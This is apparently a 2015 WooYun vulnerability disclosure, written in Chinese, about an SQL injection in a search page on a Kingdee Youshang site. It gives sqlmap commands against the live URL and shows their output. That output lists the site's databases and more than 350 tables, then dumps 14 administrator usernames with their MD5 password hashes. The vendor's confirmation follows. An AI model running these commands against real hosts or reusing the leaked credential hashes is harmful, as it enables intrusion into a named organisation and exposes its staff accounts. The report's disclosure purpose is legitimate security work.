乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-04: 细节已通知厂商并且等待厂商处理中 2015-06-04: 厂商已经确认,细节仅向厂商公开 2015-06-14: 细节向核心白帽子及相关领域专家公开 2015-06-24: 细节向普通白帽子公开 2015-07-04: 细节向实习白帽子公开 2015-07-19: 细节向公众公开
金蝶
python sqlmap.py -u "http://jinan.youshang.com/help/kiszyb/search.php?q=123" --dbs
available databases [5]:[*] activity[*] information_schema[*] test[*] youshangportal[*] ysproject
python sqlmap.py -u "http://jinan.youshang.com/help/kiszyb/search.php?q=123" -D youshangportal --tables
Database: youshangportal[359 tables]+--------------------------------+| EE_AWARD_LOG || EE_DIGG_LOG || EE_MESSAGE || EM_USER || agiletour_bingo || answer || auction_log || auction_orderlist || auction_product || cards || ee_news_detail || ee_order_list || ee_product || ee_product_comment || em_class_info || em_product_class || em_special || fouryear_kill || fouryear_product || fouryear_user || grab_bid || grab_child || grab_parent || grab_user || grab_user_point || kdcms_admin || kdcms_admin_panel || kdcms_admin_role || kdcms_admin_role_priv || kdcms_announce || kdcms_application || kdcms_application_data || kdcms_attachment || kdcms_attachment_index || kdcms_badword || kdcms_block || kdcms_block_history || kdcms_block_priv || kdcms_cache || kdcms_case || kdcms_case_data || kdcms_category || kdcms_category_priv || kdcms_collection_content || kdcms_collection_history || kdcms_collection_node || kdcms_collection_program || kdcms_comment || kdcms_comment_check || kdcms_comment_data_1 || kdcms_comment_setting || kdcms_comment_table || kdcms_content_check || kdcms_copyfrom || kdcms_datacall || kdcms_dbsource || kdcms_download || kdcms_download_data || kdcms_downservers || kdcms_ebook || kdcms_ebook_data || kdcms_ep_define || kdcms_ep_define_data || kdcms_extend_setting || kdcms_favorite || kdcms_hits || kdcms_ipbanned || kdcms_keylink || kdcms_link || kdcms_linkage || kdcms_log || kdcms_member || kdcms_member_detail || kdcms_member_group || kdcms_member_menu || kdcms_member_verify || kdcms_member_vip || kdcms_menu || kdcms_message || kdcms_message_data || kdcms_message_group || kdcms_model || kdcms_model_field || kdcms_module || kdcms_mood || kdcms_news || kdcms_news_data || kdcms_page || kdcms_pay_account || kdcms_pay_payment || kdcms_pay_spend || kdcms_picture || kdcms_picture_data || kdcms_plugin || kdcms_plugin_var || kdcms_position || kdcms_position_data || kdcms_poster || kdcms_poster_201107 || kdcms_poster_201108 || kdcms_poster_201109 || kdcms_poster_201110 || kdcms_poster_201111 || kdcms_poster_201112 || kdcms_poster_201201 || kdcms_poster_201202 || kdcms_poster_201203 || kdcms_poster_201204 || kdcms_poster_201205 || kdcms_poster_201206 || kdcms_poster_201207 || kdcms_poster_201208 || kdcms_poster_201210 || kdcms_poster_201211 || kdcms_poster_201212 || kdcms_poster_201301 || kdcms_poster_201302 || kdcms_poster_201303 || kdcms_poster_201304 || kdcms_poster_201305 || kdcms_poster_201306 || kdcms_poster_201307 || kdcms_poster_201308 || kdcms_poster_201309 || kdcms_poster_201310 || kdcms_poster_201311 || kdcms_poster_201312 || kdcms_poster_201401 || kdcms_poster_201402 || kdcms_poster_space || kdcms_queue || kdcms_release_point || kdcms_search || kdcms_search_keyword || kdcms_session || kdcms_site || kdcms_special || kdcms_special_c_data || kdcms_special_content || kdcms_sphinx_counter || kdcms_sso_admin || kdcms_sso_applications || kdcms_sso_members || kdcms_sso_messagequeue || kdcms_sso_session || kdcms_sso_settings || kdcms_tag || kdcms_template_bak || kdcms_times || kdcms_type || kdcms_urlrule || kdcms_videodemo || kdcms_videodemo_data || kdcms_vote_data || kdcms_vote_option || kdcms_vote_subject || kdcms_wap || kdcms_wap_type || kdcms_workflow || kis_collection || lsw_func || lsw_user || lsw_user_state || member || moweekly_wp_comments || moweekly_wp_links || moweekly_wp_options || moweekly_wp_postmeta || moweekly_wp_posts || moweekly_wp_term_relationships || moweekly_wp_term_taxonomy || moweekly_wp_terms || moweekly_wp_usermeta || moweekly_wp_users || ms_info || phpcms_admin || phpcms_admin_role || phpcms_admin_role_priv || phpcms_ads || phpcms_ads_place || phpcms_ads_stat || phpcms_announce || phpcms_app_category || phpcms_app_industry || phpcms_app_share || phpcms_app_suggest || phpcms_area || phpcms_ask || phpcms_ask_actor || phpcms_ask_credit || phpcms_ask_posts
Database: youshangportalTable: kdcms_admin[14 entries]+-----------------+----------------------------------+| username | password |+-----------------+----------------------------------+| guanghong_zhong | 0cfa77a94d6b84903e9e166aafad5ec2 || zhuweiwu | 13130b9b53ea5b2ff04b185df43d0ca4 || xiaoli_sun | 26ab9e2d5e7aaa64ca9456fa57066460 || tiangui_chen | 4ab23c58bec89eced5b8bc502501bb44 || liangzi | 675394aa5d40f45c339a55d5a3805d15 || qlboob | 757b91e3b3badf72d15dd885c5ff011b || fengchunlei | 9f71d34324ae6d438513cb845c3cab91 || jingjing_lan | a16bb69d9b83549d87e260b7fdd08a79 || jinbao_yang | b999740e47fe84331335aa47df611286 || weicheng_lai | c0c3ad8e0fa008a935aeb82f857c3782 || liaowei | cf12f62edf9498b9244b44708a22f81f || lijuan_lu1 | d5b4878dc4de66830021646af33f24f6 || daiyu_wu | f02dc5704927fc650e73d4e9f9a969b2 || hongda_yi | fadb8bac81e90fa0c7643721154e06cd |+-----------------+----------------------------------+
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-06-04 14:16
谢谢对金蝶的关注,深入研究金蝶系统发现安全漏洞。我们已通知相关部门修复。
暂无